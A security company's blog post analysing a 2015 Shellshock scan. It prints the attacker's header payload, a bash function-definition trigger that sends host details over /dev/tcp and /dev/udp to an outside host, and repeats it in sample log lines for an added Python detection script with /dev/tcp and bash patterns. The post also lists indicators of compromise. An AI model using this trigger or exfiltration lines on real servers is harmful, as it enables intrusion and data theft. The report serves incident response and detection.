Analecta Cyber Company Blog: Possible Compromised Host Scanning for Shellshock




At 2015-03-12T03:00:44 a scan originated from IP address (1&1 Internet AG, associated with domain ONLINEHOME-SERVER.INFO) attempting to exploit the 2014 Shellshock vulnerability (CVE-2014-6271). If successful, the payload commands would have created multiple reverse TCP and UDP connections to a second IP address in an attempt to extract detailed host information likely to be used for further compromise.


The remote attacker attempted to access a Common Gateway Interface (CGI) script named "test-cgi" located within the default "cgi-bin" directory on the web server:

GET /cgi-bin/test-cgi

The Referer and User-Agent headers supplied with the request contain the exploit trigger and the "payload", in this case initial scouting code.

() { :;};
/bin/bash -c \"
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/;
    /bin/uname -a > /dev/tcp/;
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/

(Formatted for readability.)
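As an added example that is not part of the original report, the following Python scans Apache combined-format access logs for the request pattern shown above: the "() { ... };" function-definition trigger in the Referer or User-Agent header, plus the /dev/tcp, /dev/udp, uname and /bin/bash markers from this payload. The sample log lines are constructed and use RFC 5737 documentation addresses in place of the addresses removed from the report.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log line; quoted fields may contain \" escapes, which
# matters because the Shellshock payload itself carries quoted bash code.
_Q = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _Q + r' (\d{3}) (\S+) ' + _Q + ' ' + _Q + '$')
# The trigger: a header value carrying a bash function definition "() { ... };"
# followed by commands, which vulnerable bash runs when importing the environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
# Secondary markers taken from the payload in this report.
SECONDARY = ("/dev/tcp/", "/dev/udp/", "uname", "/bin/bash")

def parse_combined(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    keys = ("host", "time", "request", "status", "size", "referer", "agent")
    return dict(zip(keys, m.groups()))

def shellshock_indicators(entry: Dict[str, str]) -> List[str]:
    """Names of the indicators present in one parsed entry (empty if clean)."""
    found = []
    for field in ("referer", "agent"):
        if SHELLSHOCK_RE.search(entry[field]):
            found.append(f"{field}: bash function definition")
        found += [f"{field}: {m}" for m in SECONDARY if m in entry[field]]
    if "/cgi-bin/" in entry["request"]:
        found.append("request: cgi-bin target")
    return found

def scan_log(lines) -> List[Dict[str, object]]:
    """Report entries whose headers carry the trigger; a bare /cgi-bin/ request is normal."""
    hits = []
    for entry in filter(None, map(parse_combined, lines)):
        indicators = shellshock_indicators(entry)
        if any(i.endswith("bash function definition") for i in indicators):
            hits.append({"host": entry["host"], "time": entry["time"],
                         "request": entry["request"], "indicators": indicators})
    return hits

# Constructed sample lines using RFC 5737 documentation addresses; the real
# addresses from the incident were removed from the report.
SAMPLE_LOG = [
    r'198.51.100.7 - - [12/Mar/2015:03:00:44 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 291 '
    r'"() { :;}; /bin/bash -c \"echo example.com/cgi-bin/test-cgi > /dev/tcp/203.0.113.5/23\"" '
    r'"() { :;}; /bin/bash -c \"/bin/uname -a > /dev/tcp/203.0.113.5/23\""',
    r'192.0.2.44 - - [12/Mar/2015:03:01:10 +0000] "GET /index.html HTTP/1.1" 200 6733 '
    r'"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]
```

Running scan_log(SAMPLE_LOG) reports only the first line, with every marker it carries listed per header, so the output can be fed straight into the indicator list below.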

Origin IP Address 
Registered by: 1&1 Internet AG 

Other IP Addresses

The "scouting" code as I've dubbed it here attempts to contact a second IP address: 
Registered by: AMEN Networks, France (RIPE)
Associated domain: None. 

At the time of this report a proxied port scan was used to enumerate ports open on and associated banners: 

FTP - 21
    220 ProFTPD 1.3.2e Server (ProFTPD) []

SMTP - 25
    220 ESMTP

HTTP - 80
    HTTP/1.1 200 OK
    Date: Mon, 23 Mar 2015 01:22:23 GMT
    Server: Apache/2.2.3 (CentOS)
    Last-Modified: Tue, 21 Jan 2014 08:24:28 GMT
    ETag: "103d80ca-1a4d-4f076bc9c2700"
    Accept-Ranges: bytes
    Content-Length: 6733
    Connection: close
    Content-Type: text/html

POP3 - 110
    +OK Hello there. <36079.1427073743@localhost.localdomain>

IMAP - 143
    * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
    * BYE Disconnected for inactivity

Indicators of Compromise

  • Connections to or from or 
  • Outbound TCP connections to on port 23. 
  • Outbound UDP connections to on port 80.

Damage Assessment

No damage was sustained by the server from these requests. Had the attack succeeded, the victim should expect secondary connections once it is established that the server is vulnerable to CVE-2014-6271 (Shellshock). The intruder would have the privileges of the running web server user. It is likely the attacker would create a secondary method of access and/or attempt to escalate to a more privileged user account. Because the attacker uses the uname tool to identify the specific kernel type and version, we assess this is a slightly more sophisticated attack methodology than seen with other common "Shellshock" attacks.

It is important to note that the registered owners of the IP addresses involved in this attack may themselves be victims of a network incident. In many cases the IP addresses identified from an incident are owned by one person or organization but are under the control of an unauthorized user.
